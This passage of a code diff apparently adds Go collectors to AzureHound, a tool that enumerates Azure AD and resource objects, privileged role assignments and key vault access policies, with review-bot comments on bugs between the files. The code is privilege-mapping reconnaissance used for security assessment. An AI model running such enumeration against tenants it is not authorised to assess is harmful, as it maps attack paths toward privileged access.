make(chan interface{}) + + groups = make(chan interface{}) + groups2 = make(chan interface{}) + groups3 = make(chan interface{}) + + roles = make(chan interface{}) + roles2 = make(chan interface{}) + + servicePrincipals = make(chan interface{}) + servicePrincipals2 = make(chan interface{}) + servicePrincipals3 = make(chan interface{}) + + tenants = make(chan interface{}) + ) + + // Enumerate Apps, AppOwners and AppMembers + appChans := pipeline.TeeFixed(ctx.Done(), listApps(ctx, client), 2) + apps := pipeline.ToAny(ctx.Done(), appChans[0]) + appOwners := pipeline.ToAny(ctx.Done(), listAppOwners(ctx, client, appChans[1])) + + // Enumerate Devices and DeviceOwners + pipeline.Tee(ctx.Done(), listDevices(ctx, client), devices, devices2) + deviceOwners := listDeviceOwners(ctx, client, devices2) + + // Enumerate Groups, GroupOwners and GroupMembers + pipeline.Tee(ctx.Done(), listGroups(ctx, client), groups, groups2, groups3) + groupOwners := listGroupOwners(ctx, client, groups2) + groupMembers := listGroupMembers(ctx, client, groups3) + + // Enumerate ServicePrincipals and ServicePrincipalOwners + pipeline.Tee(ctx.Done(), listServicePrincipals(ctx, client), servicePrincipals, servicePrincipals2, servicePrincipals3) + servicePrincipalOwners := listServicePrincipalOwners(ctx, client, servicePrincipals2) + + // Enumerate Tenants + pipeline.Tee(ctx.Done(), listTenants(ctx, client), tenants) + + // Enumerate Users + users := listUsers(ctx, client) + + // Enumerate Roles and RoleAssignments + pipeline.Tee(ctx.Done(), listRoles(ctx, client), roles, roles2) + roleAssignments := listRoleAssignments(ctx, client, roles2) + + // Enumerate AppRoleAssignments + appRoleAssignments := listAppRoleAssignments(ctx, client, servicePrincipals3) + + return pipeline.Mux(ctx.Done(), + appOwners, + appRoleAssignments, + apps, + deviceOwners, + devices, + groupMembers, + groupOwners, + groups, + roleAssignments, + roles, + servicePrincipalOwners, + servicePrincipals, + tenants, + users, + ) +} 
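Review bot: The section comments in `listAllAD` do not match the code beneath them: `// Enumerate Apps, AppOwners and AppMembers` sets up no app-member stream, and `// Enumerate ServicePrincipals and ServicePrincipalOwners` also creates `servicePrincipals3`, which feeds `listAppRoleAssignments` further down. Suggested wording: `// Enumerate Apps and AppOwners` and `// Enumerate ServicePrincipals and ServicePrincipalOwners (servicePrincipals3 feeds AppRoleAssignments below)`. `pipeline.Tee(ctx.Done(), listTenants(ctx, client), tenants)` copies into a single output; if that is only there to match the other streams, a one-line comment saying so would help the next reader.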
diff --git a/cmd/list-azure-rm.go b/cmd/list-azure-rm.go
new file mode 100644
index 0000000..b377e58
--- /dev/null
+++ b/cmd/list-azure-rm.go
@@ -0,0 +1,251 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listAzureRMCmd) +} + +var listAzureRMCmd = &cobra.Command{ + Use: "az-rm", + Long: "Lists All Azure RM Entities", + PersistentPreRunE: persistentPreRunE, + Run: listAzureRMCmdImpl, + SilenceUsage: true, +} + +func listAzureRMCmdImpl(cmd *cobra.Command, args []string) { + if len(args) > 0 { + exit(fmt.Errorf("unsupported subcommand: %v", args)) + } + + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure resource management objects...") + start := time.Now() + stream := listAllRM(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listAllRM(ctx 
context.Context, client client.AzureClient) <-chan interface{} { + var ( + functionApps = make(chan interface{}) + functionApps2 = make(chan interface{}) + + webApps = make(chan interface{}) + webApps2 = make(chan interface{}) + + automationAccounts = make(chan interface{}) + automationAccounts2 = make(chan interface{}) + + containerRegistries = make(chan interface{}) + containerRegistries2 = make(chan interface{}) + + logicApps = make(chan interface{}) + logicApps2 = make(chan interface{}) + + managedClusters = make(chan interface{}) + managedClusters2 = make(chan interface{}) + + vmScaleSets = make(chan interface{}) + vmScaleSets2 = make(chan interface{}) + + keyVaults = make(chan interface{}) + keyVaults2 = make(chan interface{}) + keyVaults3 = make(chan interface{}) + keyVaultRoleAssignments1 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments2 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments3 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + keyVaultRoleAssignments4 = make(chan azureWrapper[models.KeyVaultRoleAssignments]) + + mgmtGroups = make(chan interface{}) + mgmtGroups2 = make(chan interface{}) + mgmtGroups3 = make(chan interface{}) + mgmtGroupRoleAssignments1 = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mgmtGroupRoleAssignments2 = make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + + resourceGroups = make(chan interface{}) + resourceGroups2 = make(chan interface{}) + resourceGroupRoleAssignments1 = make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + resourceGroupRoleAssignments2 = make(chan azureWrapper[models.ResourceGroupRoleAssignments]) + + subscriptions = make(chan interface{}) + subscriptions2 = make(chan interface{}) + subscriptions3 = make(chan interface{}) + subscriptions4 = make(chan interface{}) + subscriptions5 = make(chan interface{}) + subscriptions6 = make(chan interface{}) + subscriptions7 = make(chan interface{}) + 
subscriptions8 = make(chan interface{}) + subscriptions9 = make(chan interface{}) + subscriptions10 = make(chan interface{}) + subscriptions11 = make(chan interface{}) + subscriptions12 = make(chan interface{}) + subscriptionRoleAssignments1 = make(chan interface{}) + subscriptionRoleAssignments2 = make(chan interface{}) + + virtualMachines = make(chan interface{}) + virtualMachines2 = make(chan interface{}) + virtualMachineRoleAssignments1 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments2 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments3 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments4 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + virtualMachineRoleAssignments5 = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + ) + + // Enumerate entities + pipeline.Tee(ctx.Done(), listManagementGroups(ctx, client), mgmtGroups, mgmtGroups2, mgmtGroups3) + pipeline.Tee(ctx.Done(), listSubscriptions(ctx, client), + subscriptions, + subscriptions2, + subscriptions3, + subscriptions4, + subscriptions5, + subscriptions6, + subscriptions7, + subscriptions8, + subscriptions9, + subscriptions10, + subscriptions11, + subscriptions12, + ) + pipeline.Tee(ctx.Done(), listResourceGroups(ctx, client, subscriptions2), resourceGroups, resourceGroups2) + pipeline.Tee(ctx.Done(), listKeyVaults(ctx, client, subscriptions3), keyVaults, keyVaults2, keyVaults3) + pipeline.Tee(ctx.Done(), listVirtualMachines(ctx, client, subscriptions4), virtualMachines, virtualMachines2) + pipeline.Tee(ctx.Done(), listFunctionApps(ctx, client, subscriptions6), functionApps, functionApps2) + pipeline.Tee(ctx.Done(), listWebApps(ctx, client, subscriptions7), webApps, webApps2) + pipeline.Tee(ctx.Done(), listAutomationAccounts(ctx, client, subscriptions8), automationAccounts, automationAccounts2) + pipeline.Tee(ctx.Done(), 
listContainerRegistries(ctx, client, subscriptions9), containerRegistries, containerRegistries2) + pipeline.Tee(ctx.Done(), listLogicApps(ctx, client, subscriptions10), logicApps, logicApps2) + pipeline.Tee(ctx.Done(), listManagedClusters(ctx, client, subscriptions11), managedClusters, managedClusters2) + pipeline.Tee(ctx.Done(), listVMScaleSets(ctx, client, subscriptions12), vmScaleSets, vmScaleSets2) + + // Enumerate Relationships + // ManagementGroups: Descendants, Owners and UserAccessAdmins + mgmtGroupDescendants := listManagementGroupDescendants(ctx, client, mgmtGroups2) + pipeline.Tee(ctx.Done(), listManagementGroupRoleAssignments(ctx, client, mgmtGroups3), mgmtGroupRoleAssignments1, mgmtGroupRoleAssignments2) + mgmtGroupOwners := listManagementGroupOwners(ctx, mgmtGroupRoleAssignments1) + mgmtGroupUserAccessAdmins := listManagementGroupUserAccessAdmins(ctx, mgmtGroupRoleAssignments2) + + // Subscriptions: Owners and UserAccessAdmins + pipeline.Tee(ctx.Done(), listSubscriptionRoleAssignments(ctx, client, subscriptions5), subscriptionRoleAssignments1, subscriptionRoleAssignments2) + subscriptionOwners := listSubscriptionOwners(ctx, client, subscriptionRoleAssignments1) + subscriptionUserAccessAdmins := listSubscriptionUserAccessAdmins(ctx, client, subscriptionRoleAssignments2) + + // ResourceGroups: Owners and UserAccessAdmins + pipeline.Tee(ctx.Done(), listResourceGroupRoleAssignments(ctx, client, resourceGroups2), resourceGroupRoleAssignments1, resourceGroupRoleAssignments2) + resourceGroupOwners := listResourceGroupOwners(ctx, resourceGroupRoleAssignments1) + resourceGroupUserAccessAdmins := listResourceGroupUserAccessAdmins(ctx, resourceGroupRoleAssignments2) + + // KeyVaults: AccessPolicies, Owners, UserAccessAdmins, Contributors and KVContributors + pipeline.Tee(ctx.Done(), listKeyVaultRoleAssignments(ctx, client, keyVaults2), keyVaultRoleAssignments1, keyVaultRoleAssignments2, keyVaultRoleAssignments3, keyVaultRoleAssignments4) + keyVaultAccessPolicies 
:= listKeyVaultAccessPolicies(ctx, client, keyVaults3, []enums.KeyVaultAccessType{enums.GetCerts, enums.GetKeys, enums.GetCerts}) + keyVaultOwners := listKeyVaultOwners(ctx, keyVaultRoleAssignments1) + keyVaultUserAccessAdmins := listKeyVaultUserAccessAdmins(ctx, keyVaultRoleAssignments2) + keyVaultContributors := listKeyVaultContributors(ctx, keyVaultRoleAssignments3) + keyVaultKVContributors := listKeyVaultKVContributors(ctx, keyVaultRoleAssignments4) + + // VirtualMachines: Owners, AvereContributors, Contributors, AdminLogins and UserAccessAdmins + pipeline.Tee(ctx.Done(), listVirtualMachineRoleAssignments(ctx, client, virtualMachines2), virtualMachineRoleAssignments1, virtualMachineRoleAssignments2, virtualMachineRoleAssignments3, virtualMachineRoleAssignments4, virtualMachineRoleAssignments5) + virtualMachineOwners := listVirtualMachineOwners(ctx, virtualMachineRoleAssignments1) + virtualMachineAvereContributors := listVirtualMachineAvereContributors(ctx, virtualMachineRoleAssignments2) + virtualMachineContributors := listVirtualMachineContributors(ctx, virtualMachineRoleAssignments3) + virtualMachineAdminLogins := listVirtualMachineAdminLogins(ctx, virtualMachineRoleAssignments4) + virtualMachineUserAccessAdmins := listVirtualMachineUserAccessAdmins(ctx, virtualMachineRoleAssignments5) + + // Enumerate Function App Role Assignments + functionAppRoleAssignments := listFunctionAppRoleAssignments(ctx, client, functionApps2) + + // Enumerate Web App Role Assignments + webAppRoleAssignments := listWebAppRoleAssignments(ctx, client, webApps2) + + // Enumerate Automation Account Role Assignments + automationAccountRoleAssignments := listAutomationAccountRoleAssignments(ctx, client, automationAccounts2) + + // Enumerate Container Registry Role Assignments + containerRegistryRoleAssignments := listContainerRegistryRoleAssignments(ctx, client, containerRegistries2) + + // Enumerate Logic Apps Role Assignments + logicAppRoleAssignments := 
listLogicAppRoleAssignments(ctx, client, logicApps2) + + // Enumerate Managed Cluster Role Assignments + managedClusterRoleAssignments := listManagedClusterRoleAssignments(ctx, client, managedClusters2) + + // Enumerate VM Scale Set Role Assignments + vmScaleSetRoleAssignments := listVMScaleSetRoleAssignments(ctx, client, vmScaleSets2) + + return pipeline.Mux(ctx.Done(), + automationAccounts, + automationAccountRoleAssignments, + containerRegistries, + containerRegistryRoleAssignments, + functionApps, + functionAppRoleAssignments, + keyVaultAccessPolicies, + keyVaultContributors, + keyVaultKVContributors, + keyVaultOwners, + keyVaultUserAccessAdmins, + keyVaults, + logicApps, + logicAppRoleAssignments, + managedClusters, + managedClusterRoleAssignments, + mgmtGroupDescendants, + mgmtGroupOwners, + mgmtGroupUserAccessAdmins, + mgmtGroups, + resourceGroupOwners, + resourceGroupUserAccessAdmins, + resourceGroups, + subscriptionOwners, + subscriptionUserAccessAdmins, + subscriptions, + virtualMachineAdminLogins, + virtualMachineAvereContributors, + virtualMachineContributors, + virtualMachineOwners, + virtualMachineUserAccessAdmins, + virtualMachines, + vmScaleSets, + vmScaleSetRoleAssignments, + webApps, + webAppRoleAssignments, + ) +} diff --git a/cmd/list-container-registries.go b/cmd/list-container-registries.go new file mode 100644 index 0000000..3786159 --- /dev/null +++ b/cmd/list-container-registries.go 
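Review bot: The access-type slice passed to `listKeyVaultAccessPolicies` in `listAllRM` names `enums.GetCerts` twice (`{enums.GetCerts, enums.GetKeys, enums.GetCerts}`), so one of the three intended access types is most likely never requested. If the enums package defines a secrets value (presumably `enums.GetSecrets`, which is not visible in this hunk), the third element should be that one. Otherwise principals whose key vault access policy grants only secret reads are missing from the collected data, and the resulting graph under-reports who can reach vault secrets. The argument would then read `[]enums.KeyVaultAccessType{enums.GetCerts, enums.GetKeys, enums.GetSecrets}`.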
@@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listContainerRegistriesCmd) +} + +var listContainerRegistriesCmd = &cobra.Command{ + Use: "container-registries", + Long: "Lists Azure Container Registries", + Run: listContainerRegistriesCmdImpl, + SilenceUsage: true, +} + +func listContainerRegistriesCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure container registries...") + start := time.Now() + stream := listContainerRegistries(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + 
outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listContainerRegistries(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating container registries", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureContainerRegistries(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing container registries for this subscription", "subscriptionId", id) + } else { + resourceGroupId := item.Ok.ResourceGroupId() + containerRegistry := models.ContainerRegistry{ + ContainerRegistry: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: resourceGroupId, + TenantId: client.TenantInfo().TenantId, + } + log.V(2).Info("found container registry", "containerRegistry", containerRegistry) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZContainerRegistry, + Data: containerRegistry, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing container registries", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all 
container registries") + }() + + return out +} diff --git a/cmd/list-container-registry-role-assignments.go b/cmd/list-container-registry-role-assignments.go new file mode 100644 index 0000000..7e8b696 --- /dev/null +++ b/cmd/list-container-registry-role-assignments.go 
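Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in `listContainerRegistriesCmdImpl` registers a signal that cannot be caught, so the `os.Kill` entry has no effect. A SIGTERM, the usual stop signal from a container runtime or service manager, still ends the process without cancelling `ctx` or running the deferred `gracefulShutdown`. Registering the terminate signal instead, `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)`, lets the collectors stop and close their output on a normal stop; it needs `syscall` added to the import block. The same call appears in the `cmd/list-azure-rm.go`, `cmd/list-container-registry-role-assignments.go`, `cmd/list-device-owners.go` and `cmd/list-devices.go` hunks.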
@@ -0,0 +1,141 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listContainerRegistryRoleAssignment) +} + +var listContainerRegistryRoleAssignment = &cobra.Command{ + Use: "container-registry-role-assignments", + Long: "Lists Azure Container Registry Role Assignments", + Run: listContainerRegistryRoleAssignmentImpl, + SilenceUsage: true, +} + +func listContainerRegistryRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + if err := testConnections(); err != nil { + exit(err) + } else if azClient, err := newAzureClient(); err != nil { + exit(err) + } else { + log.Info("collecting azure container registry role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream 
:= listContainerRegistryRoleAssignments(ctx, azClient, listContainerRegistries(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) + } +} + +func listContainerRegistryRoleAssignments(ctx context.Context, client client.AzureClient, containerRegistries <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), containerRegistries) { + if containerRegistry, ok := result.(AzureWrapper).Data.(models.ContainerRegistry); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating container registry role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, containerRegistry.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + containerRegistryRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this container registry", "containerRegistryId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + containerRegistryRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("found container registry role assignment", "containerRegistryRoleAssignment", containerRegistryRoleAssignment) + count++ + 
containerRegistryRoleAssignments.RoleAssignments = append(containerRegistryRoleAssignments.RoleAssignments, containerRegistryRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZContainerRegistryRoleAssignment, + Data: containerRegistryRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing container registry role assignments", "containerRegistryId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all container registry role assignments") + }() + + return out +} diff --git a/cmd/list-device-owners.go b/cmd/list-device-owners.go new file mode 100644 index 0000000..39e9b9e --- /dev/null +++ b/cmd/list-device-owners.go 
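Review bot: In the worker loop of `listContainerRegistryRoleAssignments`, the `item.Error != nil` branch only logs, and the `pipeline.SendAny` after the inner loop still emits `containerRegistryRoleAssignments` with whatever was appended before the failure. A consumer of the output cannot tell a registry whose role-assignment listing failed from one that simply has few or no assignments, which matters when the data is used to reason about who holds privileged roles. If best-effort output is intended, say so at the branch, e.g. `// best-effort: a failed listing still emits the assignments gathered so far; the error log names the affected registry`, or skip the send once an error was seen. `listDeviceOwners` in `cmd/list-device-owners.go` follows the same pattern with `data.Owners`.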
@@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listDeviceOwnersCmd) +} + +var listDeviceOwnersCmd = &cobra.Command{ + Use: "device-owners", + Long: "Lists Azure AD Device Owners", + Run: listDeviceOwnersCmdImpl, + SilenceUsage: true, +} + +func listDeviceOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure device owners...") + start := time.Now() + stream := listDeviceOwners(ctx, azClient, listDevices(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", 
duration.String()) +} + +func listDeviceOwners(ctx context.Context, client client.AzureClient, devices <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), devices) { + if device, ok := result.(AzureWrapper).Data.(models.Device); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating device owners", "result", result) + } else { + if ok := pipeline.Send(ctx.Done(), ids, device.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + data = models.DeviceOwners{ + DeviceId: id, + } + count = 0 + ) + for item := range client.ListAzureDeviceRegisteredOwners(ctx, id, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this device", "deviceId", id) + } else { + deviceOwner := models.DeviceOwner{ + Owner: item.Ok, + DeviceId: id, + } + log.V(2).Info("found device owner", "deviceOwner", deviceOwner) + count++ + data.Owners = append(data.Owners, deviceOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZDeviceOwner, + Data: data, + }); !ok { + return + } + log.V(1).Info("finished listing device owners", "deviceId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all device owners") + }() + + return out +} diff --git a/cmd/list-device-owners_test.go b/cmd/list-device-owners_test.go new file mode 100644 index 0000000..87a2306 --- /dev/null +++ b/cmd/list-device-owners_test.go 
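Review bot: The failed-type-assertion branch in the first goroutine of `listDeviceOwners` logs "unable to continue enumerating device owners" but does not stop. The loop moves on to the next device, whereas the equivalent branch in `listContainerRegistries` and `listContainerRegistryRoleAssignments` has a `return` after the log call. Either add `return` after the `log.Error(...)` line to match the siblings, or reword the message (for example `"skipping result with unexpected type"`) so the log reflects what actually happens. Note also that `result.(AzureWrapper)` is the single-value form and panics on any other type before the checked `.Data.(models.Device)` assertion is reached; only the deferred `panicrecovery.PanicRecovery()` stands behind it.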
@@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListDeviceOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockDevicesChannel := make(chan interface{}) + mockDeviceOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockDeviceOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureDeviceRegisteredOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockDeviceOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureDeviceRegisteredOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockDeviceOwnerChannel2).Times(1) + channel := listDeviceOwners(ctx, mockClient, mockDevicesChannel) + + go func() { + defer close(mockDevicesChannel) + 
mockDevicesChannel <- AzureWrapper{ + Data: models.Device{}, + } + mockDevicesChannel <- AzureWrapper{ + Data: models.Device{}, + } + }() + go func() { + defer close(mockDeviceOwnerChannel) + mockDeviceOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockDeviceOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockDeviceOwnerChannel2) + mockDeviceOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockDeviceOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.DeviceOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.DeviceOwners{}) + } else if len(data.Owners) != 2 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.DeviceOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.DeviceOwners{}) + } else if len(data.Owners) != 1 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } +} diff --git a/cmd/list-devices.go b/cmd/list-devices.go new file mode 100644 index 0000000..184b5bb --- /dev/null +++ b/cmd/list-devices.go 
